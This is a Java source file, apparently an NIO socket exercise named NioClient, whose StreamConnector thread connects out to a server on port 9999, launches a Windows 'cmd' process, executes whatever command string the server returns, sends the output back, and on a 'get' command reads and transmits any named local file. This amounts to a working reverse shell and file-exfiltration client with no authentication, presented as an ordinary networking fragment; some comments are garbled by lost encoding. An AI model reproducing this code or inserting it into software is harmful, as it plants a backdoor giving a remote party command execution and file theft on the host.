/fragment/src/com/coderside/fragment/socket/nio/NioClient.java

http://coder-fragment.googlecode.com/ · Java · 241 lines · 209 code · 27 blank · 5 comment · 23 complexity · cf274ec907137c44a09529d0083042cf MD5 · raw file

  1. package com.coderside.fragment.socket.nio;
  2. import java.io.BufferedReader;
  3. import java.io.BufferedWriter;
  4. import java.io.File;
  5. import java.io.FileInputStream;
  6. import java.io.IOException;
  7. import java.io.InputStream;
  8. import java.io.InputStreamReader;
  9. import java.io.OutputStream;
  10. import java.io.OutputStreamWriter;
  11. import java.net.InetAddress;
  12. import java.net.InetSocketAddress;
  13. import java.net.UnknownHostException;
  14. import java.nio.ByteBuffer;
  15. import java.nio.channels.SocketChannel;
  16. import java.nio.charset.Charset;
  17. import java.util.Stack;
  18. public class NioClient {
  19. private java.lang.Process p; //
  20. private InputStream is;
  21. private OutputStream os;
  22. private BufferedWriter bw;
  23. // Charset and decoder for US-ASCII
  24. private Charset charset = Charset.forName("UTF-8");
  25. // Direct byte buffer for reading
  26. private ByteBuffer dbuf = ByteBuffer.allocateDirect(1024);
  27. public NioClient() {
  28. initProcess();
  29. }
  30. private void initProcess() {
  31. try {
  32. p = Runtime.getRuntime().exec("cmd");
  33. os = p.getOutputStream();
  34. is = p.getInputStream();
  35. } catch (IOException e) {
  36. System.err.println(e.getMessage());
  37. }
  38. }
  39. public void redo() {
  40. initProcess();
  41. }
  42. public void exec(String command) {
  43. try {
  44. bw = new BufferedWriter(new OutputStreamWriter(os));
  45. bw.write(command);
  46. bw.newLine();
  47. bw.flush();
  48. bw.close();
  49. } catch (Exception e) {
  50. e.printStackTrace();
  51. }
  52. }
  53. private void writeMimeType(SocketChannel channel, String type) throws NumberFormatException, IOException {
  54. ByteBuffer bf = ByteBuffer.allocate(1);
  55. bf.put(Byte.parseByte(type));
  56. channel.write(bf);
  57. }
  58. private final String textMimeType = "0";
  59. public void flushOut(SocketChannel channel) {
  60. byte[] b = new byte[1024 * 10];
  61. int len = 0;
  62. ByteBuffer bf = ByteBuffer.allocate(1024 * 10);
  63. try {
  64. writeMimeType(channel, textMimeType);
  65. while ((len = is.read(b)) != -1) {
  66. bf.clear();
  67. if (len < b.length) {
  68. byte[] b2 = new byte[len];
  69. System.arraycopy(b, 0, b2, 0, len);
  70. bf.put(b2);
  71. bf.flip();
  72. channel.write(bf);
  73. } else {
  74. bf.put(b);
  75. bf.flip();
  76. channel.write(bf);
  77. }
  78. }
  79. p.waitFor();
  80. } catch (Exception e) {
  81. e.printStackTrace();
  82. }
  83. }
  84. private final String zipMimeType = "1";
  85. public void flushZipOut(SocketChannel channel, InputStream ins) {
  86. byte[] b = new byte[1024 * 10];
  87. int len = 0;
  88. ByteBuffer bf = ByteBuffer.allocate(1024 * 10);
  89. try {
  90. writeMimeType(channel, zipMimeType);
  91. while ((len = ins.read(b)) != -1) {
  92. bf.clear();
  93. if (len < b.length) {
  94. byte[] b2 = new byte[len];
  95. System.arraycopy(b, 0, b2, 0, len);
  96. bf.put(b2);
  97. channel.write(bf);
  98. } else {
  99. bf.put(b);
  100. channel.write(bf);
  101. }
  102. }
  103. p.waitFor();
  104. } catch (Exception e) {
  105. e.printStackTrace();
  106. } finally {
  107. if (null != ins) {
  108. try {
  109. ins.close();
  110. } catch (IOException e) {
  111. e.printStackTrace();
  112. }
  113. }
  114. }
  115. }
  116. class StreamConnector extends Thread {
  117. private Stack<String> cmdList;
  118. public StreamConnector() {
  119. cmdList = new Stack<String>();
  120. cmdList.push("ls");
  121. }
  122. public void run() {
  123. try {
  124. ByteBuffer buffer = ByteBuffer.allocate(1024);// ??1024?????
  125. InetSocketAddress isa = new InetSocketAddress(InetAddress.getByName("localhost"), 9999);
  126. SocketChannel sc = null;
  127. boolean isZip = false;
  128. while (true) {
  129. try {
  130. sc = SocketChannel.open();
  131. sc.connect(isa);
  132. redo();
  133. if (!isZip) {
  134. exec(cmdList.pop());
  135. flushOut(sc);
  136. } else {
  137. String filePath = cmdList.pop();
  138. File file = new File(filePath);
  139. if (!file.exists()) {
  140. file = new File("./" + filePath);
  141. }
  142. FileInputStream fis = new FileInputStream(file);
  143. flushZipOut(sc, fis);
  144. }
  145. sc.read(buffer);
  146. buffer.flip();// flip????????????????
  147. String instext = new String(buffer.array()).trim();
  148. buffer.clear();
  149. if (instext.startsWith("get")) {
  150. isZip = true;
  151. cmdList.push(instext.substring(4, instext.length()));
  152. } else {
  153. isZip = false;
  154. cmdList.push(instext);
  155. }
  156. } finally {
  157. if (sc != null)
  158. sc.close();
  159. }
  160. }
  161. } catch (UnknownHostException e) {
  162. e.printStackTrace();
  163. } catch (IOException e) {
  164. e.printStackTrace();
  165. }
  166. }
  167. private String readInputStream(InputStream is) throws IOException {
  168. BufferedReader br = new BufferedReader(new InputStreamReader(is));
  169. String temp = null;
  170. StringBuffer subff = new StringBuffer();
  171. while ((temp = br.readLine()) != null) {
  172. subff.append(temp.trim());
  173. }
  174. return subff.toString();
  175. }
  176. }
  177. // Ask the given host what time it is
  178. //
  179. private void send(String host, int port) throws IOException {
  180. byte inBuffer[] = new byte[100];
  181. ByteBuffer buffer = ByteBuffer.allocate(1024);// ??1024?????
  182. InetSocketAddress isa = new InetSocketAddress(InetAddress.getByName(host), port);
  183. SocketChannel sc = null;
  184. while (true) {
  185. try {
  186. System.in.read(inBuffer);
  187. sc = SocketChannel.open();
  188. sc.connect(isa);
  189. dbuf.clear();
  190. dbuf.put(inBuffer);
  191. dbuf.flip();
  192. sc.write(dbuf);
  193. sc.read(buffer);
  194. buffer.flip();// flip????????????????
  195. System.out.println(charset.decode(buffer));
  196. // ??Charset.decode???????????
  197. buffer.clear();// ????
  198. dbuf.clear();
  199. } finally {
  200. if (sc != null)
  201. sc.close();
  202. }
  203. }
  204. }
  205. public static void main(String[] args) throws IOException {
  206. try {
  207. NioClient cmd = new NioClient();
  208. StreamConnector streamConnector = cmd.new StreamConnector();
  209. streamConnector.start();
  210. } catch (Exception e) {
  211. e.printStackTrace();
  212. }
  213. }
  214. }